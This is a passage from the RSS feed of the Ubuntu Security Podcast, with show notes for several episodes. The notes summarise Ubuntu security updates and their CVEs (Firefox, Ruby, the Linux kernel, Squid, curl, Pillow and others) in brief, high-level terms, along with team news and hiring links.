<li>NULL ptr deref when processing signature algorithms - could allow a
remote client to crash a server during renegotiation</li>
</ul>
<h3 id="usn-3685-2-ruby-regression">[<a href="https://ubuntu.com/security/notices/USN-3685-2">USN-3685-2</a>] Ruby regression</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-8777">CVE-2018-8777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000074">CVE-2018-1000074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17742">CVE-2017-17742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-10784">CVE-2017-10784</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14064">CVE-2017-14064</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-0902">CVE-2017-0902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-0901">CVE-2017-0901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-0898">CVE-2017-0898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-0903">CVE-2017-0903</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4893-1-firefox-vulnerabilities-03-47">[<a href="https://ubuntu.com/security/notices/USN-4893-1">USN-4893-1</a>] Firefox vulnerabilities [03:47]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23986">CVE-2021-23986</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23985">CVE-2021-23985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23984">CVE-2021-23984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23988">CVE-2021-23988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23987">CVE-2021-23987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23983">CVE-2021-23983</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23982">CVE-2021-23982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23981">CVE-2021-23981</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>87.0 - various web issues (malicious website -&gt; XSS, DoS, RCE etc) plus
some specific fixes for issues which could allow extensions to either
spoof website pop-ups or to read the response of various cross-origin
requests, plus a silent enabling of the DevTools remote debugging feature
(so a local attacker could modify the browser config to turn this on
without any hint to the user, and then a remote attacker could use this
to snoop on the browser session)</li>
</ul>
<h3 id="usn-4894-1-webkitgtk-vulnerabilities-04-49">[<a href="https://ubuntu.com/security/notices/USN-4894-1">USN-4894-1</a>] WebKitGTK vulnerabilities [04:49]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-1870">CVE-2021-1870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1801">CVE-2021-1801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1799">CVE-2021-1799</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1789">CVE-2021-1789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1765">CVE-2021-1765</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29623">CVE-2020-29623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27918">CVE-2020-27918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual web issues - malicious website -&gt; XSS, DoS, RCE etc</li>
</ul>
<h3 id="usn-4895-1-squid-vulnerabilities-05-19">[<a href="https://ubuntu.com/security/notices/USN-4895-1">USN-4895-1</a>] Squid vulnerabilities [05:19]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25097">CVE-2020-25097</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15049">CVE-2020-15049</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different HTTP request smuggling attack issues - one could result in
possible cache poisoning and the other in the ability to bypass security
controls and access forbidden services</li>
</ul>
<h3 id="usn-4896-1-lxml-vulnerability-05-39">[<a href="https://ubuntu.com/security/notices/USN-4896-1">USN-4896-1</a>] lxml vulnerability [05:39]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28957">CVE-2021-28957</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandled HTML attributes which could allow a remote attacker to perform
XSS - depends on how lxml is used in application context</li>
</ul>
<h3 id="usn-4897-1-pygments-vulnerability-06-03">[<a href="https://ubuntu.com/security/notices/USN-4897-1">USN-4897-1</a>] Pygments vulnerability [06:03]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27291">CVE-2021-27291</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another pygments vuln (<a href="https://ubuntusecuritypodcast.org/episode-109/">Episode 109</a>) - this one due to the use of regex in
various lexers, these have exponential or cubic complexity so could allow
an attacker to DoS via CPU</li>
</ul>
<h3 id="usn-4898-1-curl-vulnerabilities-06-38">[<a href="https://ubuntu.com/security/notices/USN-4898-1">USN-4898-1</a>] curl vulnerabilities [06:38]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22890">CVE-2021-22890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22876">CVE-2021-22876</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to strip credentials from referrer headers - could then be leaked</li>
<li>Incorrect handling of session tickets when using an HTTPS proxy -
attacker who controlled the proxy could cause curl to bypass cert checks
and intercept comms as a result - only affected later Ubuntu releases
(20.04 LTS, 20.10)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="livepatch-incident-for-cve-2020-29372-07-26">Livepatch incident for CVE-2020-29372 [07:26]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/livepatch-2021-03-24-incident-investigation-report">https://ubuntu.com/blog/livepatch-2021-03-24-incident-investigation-report</a></li>
</ul>
<h3 id="summary-of-14-dot-04-esm-so-far-09-39">Summary of 14.04 ESM so far [09:39]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/what-lies-after-lts-two-years-of-ubuntu-14-04-in-esm">https://ubuntu.com/blog/what-lies-after-lts-two-years-of-ubuntu-14-04-in-esm</a></li>
</ul>
<h3 id="doh-coming-for-google-chrome-on-linux-11-01">DoH coming for Google Chrome on Linux [11:01]</h3>
<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/google-chrome-for-linux-is-getting-dns-over-https-but-theres-a-catch">https://www.bleepingcomputer.com/news/security/google-chrome-for-linux-is-getting-dns-over-https-but-theres-a-catch</a></li>
<li>Targeting chrome 91 but perhaps more likely 92 (89 is current stable
release, new release every 6 weeks)</li>
<li>Needs to parse /etc/nsswitch.conf - uses the hosts: entry and expects
&lsquo;files dns&rsquo; - should hopefully also support mdns4_minimal so that then
this would work with Ubuntu OOTB (since on 20.04 we use these 3 resolvers
by default)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E110.mp3" length="10995052" type="audio/mpeg" /><itunes:duration>13:57</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 109
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-109/</link>
          <pubDate>Fri, 26 Mar 2021 21:38:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>23a44745f686037a64e99f2db617828256373927f9e45bb2a6760f542bc6aaa6a78e7d0738bac74e3b5f98d767a562aa5d48934ea808a5039bbd9a6a8849b4a1</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 109</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for containerd, Ruby, the Linux
  kernel, Pygments and more, plus we cover some open positions within the
  team as well.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for containerd, Ruby, the Linux
  kernel, Pygments and more, plus we cover some open positions within the
  team as well.
  </itunes:summary>
        <description>  This week we look at security updates for containerd, Ruby, the Linux
  kernel, Pygments and more, plus we cover some open positions within the
  team as well.
  </description>
        <googleplay:description>  This week we look at security updates for containerd, Ruby, the Linux
  kernel, Pygments and more, plus we cover some open positions within the
  team as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for containerd, Ruby, the Linux
kernel, Pygments and more, plus we cover some open positions within the
team as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>28 unique CVEs addressed</p>
<h3 id="usn-4881-1-containerd-vulnerability-00-38">[<a href="https://ubuntu.com/security/notices/USN-4881-1">USN-4881-1</a>] containerd vulnerability [00:38]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21334">CVE-2021-21334</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When using the containerd CRI implementation (kubernetes container
runtime interface) - would share environment variables etc between
containers that shared the same image - so could allow an inadvertent
info leak from one container to another - race condition so would be less
likely to occur if not launching containers in rapid succession which
share the same image</li>
</ul>
<h3 id="usn-4882-1-ruby-vulnerabilities-01-27">[<a href="https://ubuntu.com/security/notices/USN-4882-1">USN-4882-1</a>] Ruby vulnerabilities [01:27]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25613">CVE-2020-25613</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10933">CVE-2020-10933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10663">CVE-2020-10663</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted JSON could result in RCE - could create a malicious object within
the interpreter</li>
<li>Possible info leak via unintialised memory across socket operations -
heap info leak so could expose sensitive data from the interpreter</li>
<li>Failure to validate xfer encoding header - could bypass reverse proxy and
so be vulnerable to HTTP request smuggling attacks</li>
</ul>
<h3 id="usn-4883-1-linux-kernel-vulnerabilities-02-32">[<a href="https://ubuntu.com/security/notices/USN-4883-1">USN-4883-1</a>] Linux kernel vulnerabilities [02:32]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27364">CVE-2021-27364</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27363">CVE-2021-27363</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27365">CVE-2021-27365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 kernel for bionic + 4.4 kernel for xenial</li>
<li>3 iSCSI issues, most important was heap overflow that could be exploited
by a local attacker -&gt; code-exec as root
<ul>
<li>Other 2 are info leak via kernel pointers being disclosed to userspace
and a OOB read -&gt; crash or possible infoleak</li>
</ul>
</li>
</ul>
<h3 id="usn-4884-1-linux-kernel--oem--vulnerabilities-03-13">[<a href="https://ubuntu.com/security/notices/USN-4884-1">USN-4884-1</a>] Linux kernel (OEM) vulnerabilities [03:13]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3348">CVE-2021-3348</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3347">CVE-2021-3347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20194">CVE-2021-20194</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OEM kernel - 5.10
<ul>
<li>UAF in network block device driver - local attacker could exploit for
crash/codexec</li>
</ul>
</li>
</ul>
<h3 id="usn-4885-1-pygments-vulnerability-03-36">[<a href="https://ubuntu.com/security/notices/USN-4885-1">USN-4885-1</a>] Pygments vulnerability [03:36]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20270">CVE-2021-20270</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>infinite loop -&gt; CPU based DoS when parsing crafted Standard ML files -
input file containing just &rsquo;exception&rsquo; would be enough to trigger this</li>
</ul>
<h3 id="usn-4886-1-privoxy-vulnerabilities-04-18">[<a href="https://ubuntu.com/security/notices/USN-4886-1">USN-4886-1</a>] Privoxy vulnerabilities [04:18]</h3>
<ul>
<li>14 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20214">CVE-2021-20214</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20211">CVE-2021-20211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20276">CVE-2021-20276</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20212">CVE-2021-20212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20275">CVE-2021-20275</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20273">CVE-2021-20273</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20272">CVE-2021-20272</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20217">CVE-2021-20217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20216">CVE-2021-20216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20215">CVE-2021-20215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20213">CVE-2021-20213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20210">CVE-2021-20210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20209">CVE-2021-20209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35502">CVE-2020-35502</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Privacy enhancing HTTP proxy</li>
<li>Incorrect handling of:
<ul>
<li>CGI requests -&gt; DoS/info-leak</li>
<li>regexes -&gt; DoS (crash + mem-leak)</li>
<li>client tags -&gt; DoS (memory leaks)</li>
</ul>
</li>
</ul>
<h3 id="usn-4887-1-linux-kernel-vulnerabilities-05-03">[<a href="https://ubuntu.com/security/notices/USN-4887-1">USN-4887-1</a>] Linux kernel vulnerabilities [05:03]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27364">CVE-2021-27364</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27363">CVE-2021-27363</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27170">CVE-2020-27170</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27171">CVE-2020-27171</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27365">CVE-2021-27365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3444">CVE-2021-3444</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>BPF verifier failed to properly handle mod32 destination register
truncation when source register was known to be 0 -&gt; could be turned into
an arbitrary memory read -&gt; info-leak - and can&rsquo;t rule out arbitrary
memory write -&gt; RCE</li>
<li>Spectre mitigations for BPF were found to be insufficient - could allow
an attacker to read entirety of kernel memory via speculative execution
attack through BPF</li>
<li>iSCSI issues discussed earlier too</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring-07-04">Hiring [07:04]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847/apparmor-security-engineer-remote">https://canonical.com/careers/2114847/apparmor-security-engineer-remote</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/ubuntu-security-engineer-remote">https://canonical.com/careers/2612092/ubuntu-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E109.mp3" length="6409765" type="audio/mpeg" /><itunes:duration>08:16</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 108
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-108/</link>
          <pubDate>Fri, 19 Mar 2021 11:19:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>2ed59ca5f6ca75f4929231262d6901fe2361440b506a9cc37c81784900dbf7be7c3eddbdb5af176645d4901011cba496e07a41f6689bbbed7c28f80852601598</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 108</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we start preparing for 16.04 LTS to transition to Extended
  Security Maintenance, plus we look at security updates for OpenSSH, Python,
  the Linux kernel and more, as well as some currently open positions on our
  team.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we start preparing for 16.04 LTS to transition to Extended
  Security Maintenance, plus we look at security updates for OpenSSH, Python,
  the Linux kernel and more, as well as some currently open positions on our
  team.
  </itunes:summary>
        <description>  This week we start preparing for 16.04 LTS to transition to Extended
  Security Maintenance, plus we look at security updates for OpenSSH, Python,
  the Linux kernel and more, as well as some currently open positions on our
  team.
  </description>
        <googleplay:description>  This week we start preparing for 16.04 LTS to transition to Extended
  Security Maintenance, plus we look at security updates for OpenSSH, Python,
  the Linux kernel and more, as well as some currently open positions on our
  team.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we start preparing for 16.04 LTS to transition to Extended
Security Maintenance, plus we look at security updates for OpenSSH, Python,
the Linux kernel and more, as well as some currently open positions on our
team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>28 unique CVEs addressed</p>
<h3 id="usn-4762-1-openssh-vulnerability-00-54">[<a href="https://ubuntu.com/security/notices/USN-4762-1">USN-4762-1</a>] OpenSSH vulnerability [00:54]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28041">CVE-2021-28041</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Double free in ssh-agent - so only affects openssh-client and where the
ssh-agent socket is able to be accessed by other users etc - on moderns
systems the socket is only accessible by the owner so would need to have
forwarded the ssh-agent to an attacker controlled host perhaps to be
vulnerable..</li>
</ul>
<h3 id="usn-4763-1-pillow-vulnerabilities-01-50">[<a href="https://ubuntu.com/security/notices/USN-4763-1">USN-4763-1</a>] Pillow vulnerabilities [01:50]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27923">CVE-2021-27923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27922">CVE-2021-27922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27921">CVE-2021-27921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25293">CVE-2021-25293</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25292">CVE-2021-25292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25290">CVE-2021-25290</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25291">CVE-2021-25291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25289">CVE-2021-25289</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python imaging library - uses C libraries like libjpeg for actual image
handling so ends up with usual mix of C memory corruption issues - OOB
read/write etc - crash, code exec</li>
</ul>
<h3 id="usn-4754-3-python-vulnerabilities-02-50">[<a href="https://ubuntu.com/security/notices/USN-4754-3">USN-4754-3</a>] Python vulnerabilities [02:50]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3177">CVE-2021-3177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27619">CVE-2020-27619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26116">CVE-2020-26116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8492">CVE-2020-8492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20907">CVE-2019-20907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17514">CVE-2019-17514</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9674">CVE-2019-9674</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Good illustration of main vs universe split - multiple python
versions in different releases - 2.7 in main X+B, but universe in F+G,
3.5 in X, 3.6 in B, 3.8 in F+G - but we still have 2.7 in universe on
those releases as well - so this update addresses the same vulns in
universe</li>
</ul>
<h3 id="usn-4764-1-glib-vulnerability-04-57">[<a href="https://ubuntu.com/security/notices/USN-4764-1">USN-4764-1</a>] GLib vulnerability [04:57]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28153">CVE-2021-28153</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>g_file_replace() on a dangling symlink would also create the target of
the symlink as an empty file (but only if did not already exist)</li>
</ul>
<h3 id="usn-4876-1-linux-kernel-vulnerabilities-05-49">[<a href="https://ubuntu.com/security/notices/USN-4876-1">USN-4876-1</a>] Linux kernel vulnerabilities [05:49]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3178">CVE-2021-3178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36158">CVE-2020-36158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29569">CVE-2020-29569</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 (xenial + trusty esm)</li>
</ul>
<h3 id="usn-4877-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4877-1">USN-4877-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3178">CVE-2021-3178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36158">CVE-2020-36158</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15</li>
</ul>
<h3 id="usn-4878-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4878-1">USN-4878-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3178">CVE-2021-3178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3347">CVE-2021-3347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20239">CVE-2021-20239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36158">CVE-2020-36158</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4</li>
</ul>
<h3 id="usn-4879-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4879-1">USN-4879-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20194">CVE-2021-20194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36158">CVE-2020-36158</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.8</li>
<li>Marvell wifi driver buffer overflow - could be triggered by a malicious
remote device sending a overly long ad-hoc SSID value - DoS, RCE</li>
</ul>
<h3 id="usn-4880-1-openjpeg-vulnerabilities-07-00">[<a href="https://ubuntu.com/security/notices/USN-4880-1">USN-4880-1</a>] OpenJPEG vulnerabilities [07:00]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27845">CVE-2020-27845</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27841">CVE-2020-27841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27824">CVE-2020-27824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27823">CVE-2020-27823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27814">CVE-2020-27814</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption issues fixed in openjpeg - DoS, RCE etc</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="preparing-for-16-dot-04-esm-transition-07-35">Preparing for 16.04 ESM transition [07:35]</h3>
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/ESM/16.04">https://wiki.ubuntu.com/SecurityTeam/ESM/16.04</a></li>
<li><a href="https://ubuntu.com/blog/ubuntu-16-04-lts-upgrade-vs-esm">https://ubuntu.com/blog/ubuntu-16-04-lts-upgrade-vs-esm</a></li>
<li><a href="https://ubuntu.com/engage/16-04-ESM-webinar">https://ubuntu.com/engage/16-04-ESM-webinar</a>
<ul>
<li>Lech Sandecki and Rick Harding discuss key concerns for preparing for
16.04 to move to ESM</li>
</ul>
</li>
</ul>
<h3 id="hiring-10-17">Hiring [10:17]</h3>
